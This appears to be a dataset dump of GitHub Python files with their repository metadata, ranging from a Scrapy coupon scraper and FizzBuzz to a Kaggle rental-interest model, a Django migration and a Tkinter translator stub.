blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
e310d84ef134fa90d02ddbcb43eb4159e92125c2 | 7d4597b6f9b631dd1f91059a4d904d2847e29a9c | /offerSpider/spiders/saveon.py | b9e4eb0faa58041584990acba2c7d8d25a7d856e | [] | no_license | lychlov/offerSpider | 6efc1b47e235902252ad0534f916d7f0baa49d00 | 8559ae3c65538d365aa11598d1070a4eadc82a1f | refs/heads/master | 2020-03-23T14:42:41.796002 | 2019-01-24T03:20:51 | 2019-01-24T03:20:51 | 141,694,389 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,760 | py | # # -*- coding: utf-8 -*-
# import re
#
# import requests
# import scrapy
# from bs4 import BeautifulSoup
#
# from offerSpider.util import get_header
# from offerSpider.items import CouponItem
#
#
# class SaveonSpider(scrapy.Spider):
# name = 'saveon'
# allowed_domains = ['saveoncannabis.com']
# start_urls = ['https://www.saveoncannabis.com/stores']
# page_url = 'https://www.saveoncannabis.com/stores/%s/'
#
# def parse(self, response):
# html = response.body
# soup = BeautifulSoup(html, 'lxml')
# if not re.findall(r'/stores/(.+?)/', response.url):
# max_page = int(soup.find('ul', class_='page-numbers').find('a').text)
# for i in range(2, max_page + 1):
# yield scrapy.Request(url=self.page_url % i, callback=self.parse)
# stores = soup.find_all('div', class_='store-logo')
# for store in stores:
# link = store.find('a').get('href')
# yield scrapy.Request(url=link, callback=self.store_parse)
# pass
#
# def store_parse(self, response):
# html = response.body
# soup = BeautifulSoup(html, 'lxml')
# main_coupon_info = soup.find('div', class_='store-offer-featured')
# if main_coupon_info:
# main_coupon = CouponItem()
# main_coupon['type'] = 'coupon'
# main_coupon['name'] = main_coupon_info.find('h2').text.strip()
# main_coupon['site'] = 'saveoncannabis.com'
# main_coupon['description'] = ''
# main_coupon['verify'] = True
# main_coupon['link'] = ''
# main_coupon['expire_at'] = main_coupon_info.find('div',class_='deal-countdown-info').text.strip().replace('Expires in: ','')
#
# main_coupon['coupon_type'] = 'CODE'
#
# main_coupon['code'] = ''
# main_coupon['final_website'] = ''
# main_coupon['store'] = ''
# main_coupon['store_url_name'] = ''
# main_coupon['store_description'] = ''
# main_coupon['store_category'] = ''
# main_coupon['store_website'] = ''
# main_coupon['store_country'] = ''
# main_coupon['store_picture'] = ''
# main_coupon['created_at'] = ''
# main_coupon['status'] = ''
# main_coupon['depth'] = ''
# main_coupon['download_timeout'] = ''
# main_coupon['download_slot'] = ''
# main_coupon['download_latency'] = ''
# yield main_coupon
#
# coupon_infos = soup.find('div', class_='coupons-other').find_all('div', class_='white-block')
# if coupon_infos:
# for coupon_info in coupon_infos:
# coupon = CouponItem()
# coupon['type'] = 'coupon'
# coupon['name'] = ''
# coupon['site'] = ''
# coupon['description'] = ''
# coupon['verify'] = ''
# coupon['link'] = ''
# coupon['expire_at'] = ''
# coupon['coupon_type'] = ''
# coupon['code'] = ''
# coupon['final_website'] = ''
# coupon['store'] = ''
# coupon['store_url_name'] = ''
# coupon['store_description'] = ''
# coupon['store_category'] = ''
# coupon['store_website'] = ''
# coupon['store_country'] = ''
# coupon['store_picture'] = ''
# coupon['created_at'] = ''
# coupon['status'] = ''
# coupon['depth'] = ''
# coupon['download_timeout'] = ''
# coupon['download_slot'] = ''
# coupon['download_latency'] = ''
# yield coupon
# pass
#
#
# def get_domain_url(long_url):
# domain = re.findall(r'^(http[s]?://.+?)[/?]', long_url + '/')
# return domain[0] if domain else None
#
#
# def get_real_url(url, try_count=1):
# if try_count > 3:
# return url
# try:
# rs = requests.get(url, headers=get_header(), timeout=10, verify=False)
# if rs.status_code > 400 and get_domain_url(rs.url) == 'www.offers.com':
# return get_real_url(url, try_count + 1)
# if get_domain_url(rs.url) == get_domain_url(url):
# target_url = re.findall(r'replace\(\'(.+?)\'', rs.content.decode())
# if target_url:
# return target_url[0].replace('\\', '') if re.match(r'http', target_url[0]) else rs.url
# else:
# return rs.url
# else:
# return get_real_url(rs.url)
# except Exception as e:
# print(e)
# return get_real_url(url, try_count + 1)
| [
"czk499658904@126.com"
] | czk499658904@126.com |
3542a1d22ffb90d42890a2431d8e4b98643f59ec | 4fe4f712cb49f872ae9e35777a47a53290715741 | /authors_hse.py | 6d878d3c7fec402d977da1a1ee52137102218fe3 | [] | no_license | koo2018/liblist | 601cd62827a924f8368d39bd67d18a14a6b3c7de | c7133d4e17a73daf3b75c2a5674f45109ac9edeb | refs/heads/master | 2022-12-19T06:11:54.300114 | 2020-09-17T15:04:21 | 2020-09-17T15:04:21 | 286,531,555 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 731 | py | import json,re
files = ['origins/mediacom_academ.txt','origins/mediacom_creative.txt','origins/jour_academ.txt','origins/jour_creative.txt',
'origins_new/allbooks.txt','origins_new/mediacom.txt','origins_new/jour.txt']
# Читаем словарь из файла
with open('data.json', 'r') as f:
data = json.loads(str(f.read()))
with open('authors/authors.txt', 'r') as auth_f:
authors = auth_f.readlines()
for person in authors:
pers = person.split()[0].strip()+" "+person.split()[1].strip()[:1]+"."
for dt in data:
for dt1 in data[dt]:
if pers in data[dt][dt1]['0']:
print (str(dt).split("/")[1], person.strip(), "=>", data[dt][dt1]['0'])
| [
"kookoondra@gmail.com"
] | kookoondra@gmail.com |
8a2298a365b556a735933c0a51bd7af1d2150fa2 | 6061f1ce64586340c6362226cebac321d0dd9499 | /FizzBuzzer/fizzbuzz.py | 92374a8e7ad08ee82300c93500cf000655d4a018 | [] | no_license | work777/FizzBuzz | 4381ff30c6d69e1842d783f5f7c93b13623fa3a4 | dbf9aef4be2fc70209f6c75c743a4667424173a4 | refs/heads/master | 2020-05-22T22:48:24.097378 | 2017-03-15T14:32:06 | 2017-03-15T14:32:06 | 84,731,965 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 725 | py | # FizzBuzz Game
colorgreen = "\033[1;32m{0}\033[00m"
a = int(raw_input("Please insert number between 1 and 100: "))
while a < 1 or a > 100:
if a < 1:
print "number lower than minimum amount (1)"
if a > 100:
print "number exceeding maximum amount (100)"
a = int(raw_input("Please insert number between 1 and 100: "))
for c in range (a):
d=c+1
divisable_by_three = d % 3
divisable_by_five = d % 5
divisable_by_fifteen = d % 15
if divisable_by_fifteen == 0:
print colorgreen.format("fizzbuzz!")
elif divisable_by_three == 0:
print "fizz"
elif divisable_by_five == 0:
print "buzz"
else:
print d
import time
time.sleep(10) | [
"andy911@gmx.com"
] | andy911@gmx.com |
3655a1d7009c58072673e92b9dcc169dbed6d245 | bcbcd360967d9f79ef542ead5b30de42ec61b2d3 | /code_v1_recovered/Unigrams/top100LinksPerCom.py | 4a2b7812a4374ffdf8f5fa87ecf736bcdf22e711 | [] | no_license | Roja-B/EvolvingComs | d00b30576e6b8977ce1be0c6317155bfeb711806 | b58fa29972d9aad095ed0f364b1e0ec876b9b6c5 | refs/heads/master | 2020-04-14T18:30:48.657243 | 2013-02-11T05:54:16 | 2013-02-11T05:54:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,233 | py | import operator
import sys
from noLow import *
# this program produces the list of top 100 links per community based on the Chi-squared table for each time window
#PATH = raw_input('Enter data path: ')
#M = int(raw_input('Enter the number of communities: '))
#tablefilename = raw_input("Enter file name: ")
pathfile = open("PATHSplusCOMS","r")
tablefilename = "Chi2.txt"
for line in pathfile:
line = line.strip()
L = line.split("\t")
PATH = L[0]+"/RelevantLinks"
M = int(L[1])
f = open(PATH+'/'+tablefilename,"r")
Communities= []
#for each community we need a hash table
for i in range(M):
Communities.append(dict())
for line in f:
link = line.split('\t')[0]
for i in range(0,M):
count = float(line.split('\t')[i+1])
Communities[i][link] = count
for i in range(0,M):
sorted_com = sorted(Communities[i].iteritems(), key=operator.itemgetter(1),reverse=True)
t = open(PATH+"/NoLowtop50Links"+str(i),"w")
length = len(sorted_com)
count = 0
for j in range(length)):
if linkvotes[sorted_com[j][0]] < 10 : continue
t.write("link "+sorted_com[j][0]+' '+str(sorted_com[j][1])+'\n')
count +=1
if count == 50: break
t.close()
f.close()
pathfile.close()
| [
"roja@ucla.edu"
] | roja@ucla.edu |
76dc1400b29bc1a620d6aa9777f6190b1f171f74 | 9e06099975a9ed25758af8bc99924b1603ab738f | /medium/p55_jump_game.py | 7b00f1c18c871bf5c80bfdd61e1e48b85f047c3d | [] | no_license | Yohan923/leetcode_python | 803a76f04c9cd3ce35d2ea1b0ce101a76d5718a2 | b2043827840e4fb380901406537f80adb1a1d190 | refs/heads/master | 2020-03-30T20:16:48.656432 | 2019-09-25T13:11:14 | 2019-09-25T13:11:14 | 151,581,314 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 990 | py | """
Given an array of non-negative integers, you are initially positioned at the first index of the array.
Each element in the array represents your maximum jump length at that position.
Determine if you are able to reach the last index.
"""
GOOD = True
class Solution:
# time limit
# DP bottom up
def can_jump(self, nums):
nums[len(nums) - 1] = GOOD
for i in range(len(nums) - 2, -1, -1):
max_length = min(i + nums[i] + 1, len(nums))
for j in range(i + 1, max_length):
if nums[j] is GOOD:
nums[i] = GOOD
break
return nums[0] is GOOD
# only ever reach the right most GOOD anyways from bottom up method
def can_jump_greedy(self, nums):
cur_good = len(nums) - 1
for i in range(len(nums) - 2, -1, -1):
if cur_good <= i + nums[i]:
cur_good = i
return cur_good == 0
"""
:type nums: List[int]
:rtype: bool
"""
| [
"johnz0923@gmail.com"
] | johnz0923@gmail.com |
057c68d069a43d8f9a58ad6455d49dee7e050db9 | 91056388c845468e0eb2acba3f605c8e57c8e789 | /0/hello-student.py | a27ac0d03645073b11192027b1b3111dc2b387b5 | [] | no_license | skopjehacklab/programming-101-exercises | 96dde61dfff76e0bc90ab259895d16bb877ec487 | c306f2969ee34d2771cd0247db2317636a8b729a | refs/heads/master | 2021-01-10T19:23:21.766724 | 2015-11-11T17:55:29 | 2015-11-11T17:55:29 | 42,821,254 | 6 | 17 | null | 2015-10-19T18:04:39 | 2015-09-20T17:00:37 | Python | UTF-8 | Python | false | false | 24 | py | print("Hello student!")
| [
"andrejtrajchevski@gmail.com"
] | andrejtrajchevski@gmail.com |
7c6e69f50efaff6c5df3cda141705dc27ef4c624 | 617b08a3f7c84cc76ac18cd241c3c45d2e21f6dd | /tests/test_mapper.py | 93d9b9e177d6bbcdc72f1734c9af9d838ca2101b | [] | no_license | talhahkazi93/projects | 6cbe3f5819a459be2b462935ea5560fedf7341ca | ab46ab8572d10787a298ea5d5e57a379ff58c4a4 | refs/heads/main | 2021-10-08T12:59:18.484677 | 2021-10-04T03:50:12 | 2021-10-04T03:50:12 | 141,942,615 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 993 | py | import string
from mapper.mapper import create_map,create_markers,list_markers,edit_markers
import random
Baseurl = 'https://cartes.io/'
test_map_id = "bc105f33-f83b-4eab-89e3-30288c3f2ce9"
test_marker_id = '1431'
test_marker_token = "7muIXhEHClVrhEtWj1BpBhpYHV213TRv"
test_longitute = random.randrange(-179,179)
test_latitude = random.randrange(-89,89)
test_category_name= ''.join(random.choices(string.ascii_letters, k=7))
print(test_latitude,test_longitute,test_category_name)
def test_create_map():
res,r = create_map()
assert r.status_code == 200
def test_create_markers():
res, r = create_markers(map_id=test_map_id,lat=test_latitude,long=test_longitute,cat_name=test_category_name)
assert r.status_code == 201
def test_list_markers():
res, r = list_markers(map_id=test_map_id)
assert r.status_code == 200
def test_edit_markers():
res, r = edit_markers(map_id=test_map_id,marker_id=test_marker_id,token=test_marker_token)
assert r.status_code == 200 | [
"34499780+talhahkazi93@users.noreply.github.com"
] | 34499780+talhahkazi93@users.noreply.github.com |
61eface07e2a27ae86d3c33097cb278cffe65e4f | a6d45b7b0caccc92dd7b0d2cc352498a32f5a181 | /uploader/migrations/0001_initial.py | 52eaec7d149d4ac8deb876b1956156002064a661 | [] | no_license | suhailvs/djangofileupload | e149e27b085f18f69c61074039e08a9c74283ca2 | 40b73cdf5c50bd44a4956ec70cf52d4c358f58c2 | refs/heads/master | 2023-03-23T17:34:53.077721 | 2020-04-20T16:09:29 | 2020-04-20T16:09:29 | 20,531,971 | 9 | 2 | null | null | null | null | UTF-8 | Python | false | false | 565 | py | # Generated by Django 3.0.5 on 2020-04-20 15:29
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Upload',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('upload_file', models.FileField(upload_to='')),
('upload_date', models.DateTimeField(auto_now_add=True)),
],
),
]
| [
"suhailvs@gmail.com"
] | suhailvs@gmail.com |
13fddff98ac344fe3f4a0b18d5c637d314a4e750 | ad657deade0385f6426c1b8abbe73349b7963eab | /modelo/Tarjeta.py | 2e19cfc2546c2365c48b7a80a46c4dcc72382642 | [] | no_license | andres2508/SimonController | 436c7ccbdc3b9b8a11a5e2bc931c7800f459bd06 | 37e4060de3f1f12c6acd55dad4100fff69ea2df9 | refs/heads/master | 2021-01-10T13:48:38.072856 | 2016-03-02T19:35:17 | 2016-03-02T19:35:17 | 43,324,100 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,890 | py | __author__ = 'Andres'
import SocketServer
import socket
# from modelo import Medicion
import Medicion
import threading
import json
import os
import urllib2
class Tarjeta:
##---------------------------------------------------------------------------------
## Constructor
##---------------------------------------------------------------------------------
def __init__(self, sc, tipo_tarjeta, direccion_ip, minimum_frequency, maximum_frequency, instant_bandwith):
self.tipo_tarjeta = tipo_tarjeta
self.id_tarjeta = 0
self.minimum_frequency = minimum_frequency
self.maximum_frequency = maximum_frequency
self.instant_bandwith = instant_bandwith
self.isDisponible = True
self.direccion_ip = direccion_ip
self.mediciones = []
###
# Variables Servidor TCP
###
self.socket = sc
self.isConnected = True
##---------------------------------------------------------------------------------
## Funcionalidades
##---------------------------------------------------------------------------------
def correr_funcion(self, funcion, measurement_id, start_frec, final_frec, canalization, span_device, time, samples):
resultado = "Sin resultado"
for i in range(0, samples):
if funcion == "occ":
nueva_medicion = Medicion.Medicion(funcion,
"funciones/" + self.tipo_tarjeta + "/Ocupacion/SIMONES_Ocupacion.py",
start_frec, final_frec, canalization,
span_device, measurement_id, time)
resultado = nueva_medicion.correr_medicion(self.socket)
self.grabar_samples_measurement(resultado, measurement_id, i)
# t = threading.Thread(target=nueva_medicion.correr_medicion, args=(self.socket,))
# t.start()
# self.mediciones.append(nueva_medicion)
self.send_post_result(measurement_id, samples)
def send_post_result(self,measurement_id,samples):
data_json = None
url = 'http://192.168.160.96:9999/post'
for i in range(0, samples):
file_name = str(measurement_id)+ "-" + str(i)
with open("/home/andres/Escritorio/SimonController/modelo/results/"+file_name) as data_file:
data_json = json.load(data_file)
print "ESTE ES EL JSON"
print data_json
req = urllib2.Request(url)
req.add_header('Content-Type', 'application/json')
response = urllib2.urlopen(req, data_json)
def grabar_samples_measurement(self, resultado, measurement_id, counter):
file_name = str(measurement_id) + "-" + str(counter)
with open("/home/andres/Escritorio/SimonController/modelo/results/" + file_name, "w") as outfile:
json.dump(resultado, outfile)
def buscar_medicion(self, measurement_id):
return "hola"
##---------------------------------------------------------------------------------
## Gets and Sets
##---------------------------------------------------------------------------------
def getMinimum_Frecuency(self):
return self.minimum_frecuency
def getMaximum_Frecuency(self):
return self.maximum_frecuency
def getInstant_Bandwith(self):
return self.instant_bandwith
def isDisponible(self):
return self.isDisponible
def setMinimum_Frecuency(self, minimum_frecuency):
self.minimum_frecuency = minimum_frecuency
def setMaximum_Frecuency(self, maximum_frecuency):
self.maximum_frecuency = maximum_frecuency
def getTipo_tarjeta(self):
return self.tipo_tarjeta
def getId_tarjeta(self):
return self.id_tarjeta
| [
"jaime.aristizabal.2508@gmail.com"
] | jaime.aristizabal.2508@gmail.com |
8405b0d28ef4de717b23a6316d12d896d87bf050 | 3f348ca2d86f7a272f4eaaa15327066f37478737 | /MySigma_4.py | 34ecb7d197c7576774e90f52ea712e6f83462c43 | [] | no_license | christinaengg/Two-sigma-connect-Rental-Listing-Inquiries | a04995c33e43ebc71a99302547508d72693e0fe1 | 7d5f8f9d464ff006a2c34666df5237fe4b8fec8f | refs/heads/master | 2021-01-20T08:33:35.044965 | 2017-05-03T01:41:16 | 2017-05-03T01:41:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,898 | py | import numpy as np
import pandas as pd
#Import train and test json files as dataframes
train_df = pd.read_json(open("train.json", "r"))
test_df = pd.read_json(open("test.json", "r"))
#print(train_df.tail())
#Data Exploration
train_df.describe()
test_df.describe()
#Take out outliers for bedrooms, bathrooms, price
#print(train_df.bathrooms.unique())
#print(test_df.bathrooms.unique())
#print(train_df.bedrooms.unique())
#print(test_df.bedrooms.unique())
#test_df["bathrooms"].loc[19671] = 1.5
#test_df["bathrooms"].loc[22977] = 2.0
#test_df["bathrooms"].loc[63719] = 2.0
#train_df["price"] = train_df["price"].clip(upper=13000)
#See the frequency of each feature and rank them based on frequency
'''import collections
def most_common(lst):
features = collections.Counter(lst)
feature_value = features.keys()
frequency = features.values()
data = [('feature_value', feature_value),
('frequency', frequency),]
df = pd.DataFrame.from_items(data)
return df.sort_values(by = 'frequency', ascending = False)'''
#Function to make a new column for features
def newColumn(name, df, series):
feature = pd.Series(0, df.index, name = name)
for row,word in enumerate(series):
if name in word:
feature.iloc[row] = 1
df[name] = feature
return df
#Select features based on frequency
facilities = ['Elevator','Cats Allowed','Hardwood Floors','Dogs Allowed','Doorman','Dishwasher','No Fee','Laundry in Building','Fitness Center',
'Pre-War', 'Laundry in Unit', 'Roof Deck', 'Outdoor Space', 'Dining Room', 'High Speed Internet', 'Balcony', 'Swimming Pool']
for name in facilities:
train_df = newColumn(name, train_df, train_df['features'])
test_df = newColumn(name, test_df, test_df['features'])
#print(train_df.head()
#Make attributes from created and photos column
train_df["created"] = pd.to_datetime(train_df["created"])
train_df["created_year"] = train_df["created"].dt.year
train_df["created_month"] = train_df["created"].dt.month
train_df["created_day"] = train_df["created"].dt.day
train_df["num_photos"] = train_df["photos"].apply(len)
#test_df
test_df["created"] = pd.to_datetime(test_df["created"])
test_df["created_year"] = test_df["created"].dt.year
test_df["created_month"] = test_df["created"].dt.month
test_df["created_day"] = test_df["created"].dt.day
test_df["num_photos"] = test_df["photos"].apply(len)
#Create new attributes from price
train_df['price'] = train_df['price'].clip(upper=13000)
train_df["logprice"] = np.log(train_df["price"])
train_df["price_t"] =train_df["price"]/train_df["bedrooms"]
train_df["room_sum"] = train_df["bedrooms"]+train_df["bathrooms"]
train_df['price_per_room'] = train_df['price']/train_df['room_sum']
#Test dataset
test_df['price'] = test_df['price'].clip(upper=13000)
test_df["logprice"] = np.log(test_df["price"])
test_df["price_t"] =test_df["price"]/test_df["bedrooms"]
test_df["room_sum"] = test_df["bedrooms"]+test_df["bathrooms"]
test_df['price_per_room'] = test_df['price']/test_df['room_sum']
#Concatenate latitude and longitude into one column
train_df['latitude'] = round(train_df['latitude'], 2)
train_df['longitude'] = round(train_df['longitude'], 2)
train_df['latlong'] = train_df.latitude.map(str) + ', ' + train_df.longitude.map(str)
#print(len(train_df['latlong'].unique()))
test_df['latitude'] = round(test_df['latitude'], 2)
test_df['longitude'] = round(test_df['longitude'], 2)
test_df['latlong'] = test_df.latitude.map(str) + ', ' + test_df.longitude.map(str)
#Obtain zip code from unique latitude and longitude positions
'''l = pd.concat([train_df['latlong'], test_df['latlong']]).unique()
ll = pd.DataFrame(l)
#print(len(l))
l1.to_csv('C:/Users/tingt/PycharmProjects/BIA656/Final/neighborhood_new.csv')
from geopy.geocoders import Nominatim
geolocator = Nominatim()
#location = geolocator.reverse(train_df.iloc[484]['latlong'])
#location = geolocator.reverse(l[485])
#print(location.raw['address')
for i in range(581):
location = geolocator.reverse(l[i])
print(location.raw['address']['postcode'])
'''
#Import csv with zipcodes of unique latitude and longitude. Create id for unique zipcodes
zipcode = pd.read_csv("neighborhood_new.csv")
#print(len(zipcode['postal_code'].unique()))
z_id = zipcode['postal_code'].unique()
z_id = pd.DataFrame(z_id)
z_id.columns = ['postal_code']
z_id['zip_id'] = [i for i in range(len(z_id))]
zipcode = pd.merge(zipcode, z_id, how = 'left', on = 'postal_code')
#Merge zipcode and its id with train and test set
train_df= pd.merge(train_df, zipcode, how = 'left', on=['latlong'])
train_df = train_df.drop(['void', 'zip_code_index'], 1)
test_df = pd.merge(test_df, zipcode, how = 'left', on=['latlong'])
test_df = test_df.drop(['void', 'zip_code_index'], 1)
#print(train_df.head())
#Create index for unique building and manager ids, then merge with train and test set
b_id = pd.concat([train_df['building_id'], test_df['building_id']]).unique()
b_id = pd.DataFrame(b_id)
b_id.columns = ['building_id']
b_id['building_index'] = [i for i in range(len(b_id))]
m_id = pd.concat([train_df['manager_id'], test_df['manager_id']]).unique()
m_id = pd.DataFrame(m_id)
m_id.columns = ['manager_id']
m_id['manager_index'] = [i for i in range(len(m_id))]
#print(m_id)
train_df= pd.merge(train_df, b_id, how = 'left', on=['building_id'])
train_df= pd.merge(train_df, m_id, how = 'left', on=['manager_id'])
test_df = pd.merge(test_df, b_id, how = 'left', on=['building_id'])
test_df = pd.merge(test_df, m_id, how = 'left', on=['manager_id'])
#print(train_zip.tail())
#Define attributes and dependent variable
features_to_use = ["bathrooms", "bedrooms", "price",
"num_photos", "Elevator", "Dogs Allowed",'Hardwood Floors','Cats Allowed',
'Dishwasher','Doorman', 'No Fee','Laundry in Building','Fitness Center',
'Pre-War', 'Laundry in Unit', 'Roof Deck', 'Outdoor Space', 'Dining Room', 'High Speed Internet', 'Balcony', 'Swimming Pool',
"created_year", "created_month", "created_day",'building_index', 'manager_index', 'zip_id'
]
target_num_map = {'high':0, 'medium':1, 'low':2}
X = train_df[features_to_use]
y = np.array(train_df['interest_level'].apply(lambda x: target_num_map[x]))
#Modeling
#Random Forest
from sklearn.model_selection import train_test_split
from sklearn.metrics import log_loss
from sklearn.metrics import accuracy_score
from sklearn.metrics import roc_auc_score
from sklearn.ensemble import RandomForestClassifier
random_state = 5000
X_train, X_val, y_train, y_val = train_test_split(X, y, test_size=0.34, random_state = 5000)
rf1 = RandomForestClassifier(n_estimators=250, criterion='entropy', n_jobs = 1, random_state=random_state)
rf1.fit(X_train, y_train)
y_val_pred = rf1.predict_proba(X_val)
y_val_pred_acc = rf1.predict(X_val)
print(log_loss(y_val, y_val_pred))
print(accuracy_score(y_val, y_val_pred_acc))
#Using test dataset for submission
X_test = test_df[features_to_use]
y_test = rf1.predict_proba(X_test)
sub = pd.DataFrame()
sub["listing_id"] = test_df["listing_id"]
for label in ["high", "medium", "low"]:
sub[label] = y_test[:, target_num_map[label]]
sub.to_csv("submission.csv", index=False)
#Logistic Regression
from sklearn.linear_model import LogisticRegression
rf2 = LogisticRegression()
rf2.fit(X_train, y_train)
y_val_pred2 = rf2.predict_proba(X_val)
y_val_pred_acc2 = rf2.predict(X_val)
print(log_loss(y_val, y_val_pred2))
print(accuracy_score(y_val, y_val_pred_acc2))
#Decision tree
from sklearn.tree import DecisionTreeClassifier
rf3 = DecisionTreeClassifier()
rf3.fit(X_train, y_train)
y_val_pred3 = rf3.predict_proba(X_val)
y_val_pred_acc3 = rf3.predict(X_val)
print(log_loss(y_val, y_val_pred3))
print(accuracy_score(y_val, y_val_pred_acc3))
#Naive Bayes
from sklearn.naive_bayes import GaussianNB
rf4 = GaussianNB()
rf4.fit(X_train, y_train)
y_val_pred4 = rf4.predict_proba(X_val)
y_val_pred_acc4 = rf4.predict(X_val)
print(log_loss(y_val, y_val_pred4))
print(accuracy_score(y_val, y_val_pred_acc4))
#Bagging
from sklearn.ensemble import BaggingClassifier
rf5 = BaggingClassifier()
rf5.fit(X_train, y_train)
y_val_pred5 = rf5.predict_proba(X_val)
y_val_pred_acc5 = rf5.predict(X_val)
print(log_loss(y_val, y_val_pred5))
print(accuracy_score(y_val, y_val_pred_acc5))
#KNN
from sklearn.neighbors import KNeighborsClassifier
rf6 =KNeighborsClassifier()
rf6.fit(X_train, y_train)
y_val_pred6 = rf6.predict_proba(X_val)
y_val_pred_acc6 = rf6.predict(X_val)
print(log_loss(y_val, y_val_pred6))
print(accuracy_score(y_val, y_val_pred_acc6))
#AdaBoost
from sklearn.ensemble import AdaBoostClassifier
rf7 = AdaBoostClassifier(n_estimators=250)
rf7.fit(X_train, y_train)
y_val_pred7 = rf7.predict_proba(X_val)
y_val_pred_acc7 = rf7.predict(X_val)
print(log_loss(y_val, y_val_pred7))
print(accuracy_score(y_val, y_val_pred_acc7))
#Evaulation
'''
#Compare ROC of each Algorithm
import matplotlib.pyplot as plt
from sklearn import metrics
#RandomForest
fpr1, tpr1, threshold1 = metrics.roc_curve(y_val_pred_acc, y_val_pred)
roc_auc1 = metrics.auc(fpr1, tpr1)
plt.title('ROC of RandomForest')
plt.plot(fpr1, tpr1, 'b', label = 'AUC = %0.2f' % roc_auc1)
plt.legend(loc = 'lower right')
plt.plot([0, 1], [0, 1],'r--')
plt.xlim([0, 1])
plt.ylim([0, 1])
plt.ylabel('True Positive Rate')
plt.xlabel('False Positive Rate')
plt.show()
'''
'''#SVM
from sklearn.svm import SVC
rf2 = SVC()
rf2.fit(X_train, y_train)
y_val_pred2 = rf2.predict_proba(X_val)
y_val_pred_acc2 = rf2.predict(X_val)
print(log_loss(y_val, y_val_pred2))
print(accuracy_score(y_val, y_val_pred_acc2))
'''
| [
"noreply@github.com"
] | christinaengg.noreply@github.com |
cdb79ea8caba3f6c50aa01864708c24b7b86a2c7 | bd7ce346d7579ab7699de7cc49e27fe6df8a8897 | /Aeroporto/Classes/VendaPassagem.py | 6d631cd3076b3d57df7afe83ec36b53ab751af4d | [] | no_license | MatheusEmanuel/aeroporto-atv-poo | 23978311c012e34199dbec14e67716c1dab6d418 | e8a9187952fac92fb34087ceed6d4f932ead09af | refs/heads/main | 2023-08-29T11:42:20.339003 | 2021-09-15T20:56:55 | 2021-09-15T20:56:55 | 304,124,888 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,155 | py | #Author: Matheus Emanuel Cincinato Pinto
#coding: utf-8
from Passageiro import Passageiro
from Passagem import Passagem
from Companhia import Companhia_Aerea
from TipoVoo import VooTipo
class Venda_de_Passagem(Passageiro,Passagem,Companhia_Aerea,VooTipo):
def __init__(self):
self._Definir_Companhia()
self._Vender_Passagem()
self._DefinirTipoVoo()
self._ImprimirPassagem()
@classmethod
def _Vender_Passagem(cls):
cls._Add_Dados_Passageiro()
cls._Definir_Passagem()
@classmethod
def _ImprimirPassagem(cls):
if (cls._TipoVoo == '1'):
print("\n" + "=" * 79 + "\n" + "=" * 34 + " PASSAGEM " + "=" * 35 + "\n" + "=" * 79 + "\n")
print("\n\t\t{} AGRADECE A PREFERENCIA.\n"
"\n\t\tDados da Passageiro"
"\n\t\t\tNome: {}"
"\n\t\t\tCPF: {}"
"\n\t\t\tRG: {}"
"\n\t\tDADOS DA PASSAGEM"
"\n\t\t\tOrigem: {}"
"\n\t\t\tDestino: {}"
"\n\t\t\tData ida/volta: {} - {}"
"\n\t\t\tHorario partida ida/volta: {} - {}"
"\n\t\t\tPreço: {}".format(cls._Companhia,cls._Nome,cls._CPF,cls._RG,cls._Origem,cls._Destino,cls._Ida,cls._Volta,cls._HoraPart1,cls._HoraPart2,cls._Preco))
print("\n" + "=" * 79 + "\n" + "=" * 79)
elif (cls._TipoVoo == '2'):
print("\n" + "=" * 79 + "\n" + "=" * 35 + " PASSAGEM " + "=" * 35 + "\n" + "=" * 79 + "\n")
print("\n\t\t{} AGRADECE A PREFERENCIA.\n"
"\n\t\tDados da Passageiro"
"\n\t\t\tNome: {}"
"\n\t\t\tCPF: {}"
"\n\t\t\tRG: {}"
"\n\t\tDADOS DA PASSAGEM"
"\n\t\t\tOrigem: {}"
"\n\t\t\tDestino: {}"
"\n\t\t\tData ida: {}"
"\n\t\t\tHorario partida: {}"
"\n\t\t\tPreço: {}".format(cls._Companhia,cls._Nome,cls._CPF,cls._RG,cls._Origem,cls._Destino,cls._Ida,cls._HoraPart1,cls._Preco))
print("\n" + "=" * 79 + "\n" + "=" * 79) | [
"matheus_cincinato@hotmail.com"
] | matheus_cincinato@hotmail.com |
a1110aec6eae56b65bf086881a86a5462e6ae5c8 | 0aea301f1a9ae329302865ffcd86cccdec3ba358 | /ultimate translator 1.0.py | 4899df658190f6adb739f024d2941d967fd6b578 | [] | no_license | abhishekmishramm1997/The-Ultimate-Translator | 9cfa76c1dd166ca725f993c4075facfb813a985f | 2c8ff7bf8a99dc387bdd3b25c3a493279672c7fb | refs/heads/master | 2021-01-20T12:49:34.961844 | 2017-04-28T09:18:52 | 2017-04-28T09:18:52 | 90,412,323 | 0 | 0 | null | 2017-05-05T20:05:15 | 2017-05-05T20:05:15 | null | UTF-8 | Python | false | false | 4,893 | py | from Tkinter import *
from gtts import gTTS
import os
from translate import Translator
root = Tk()
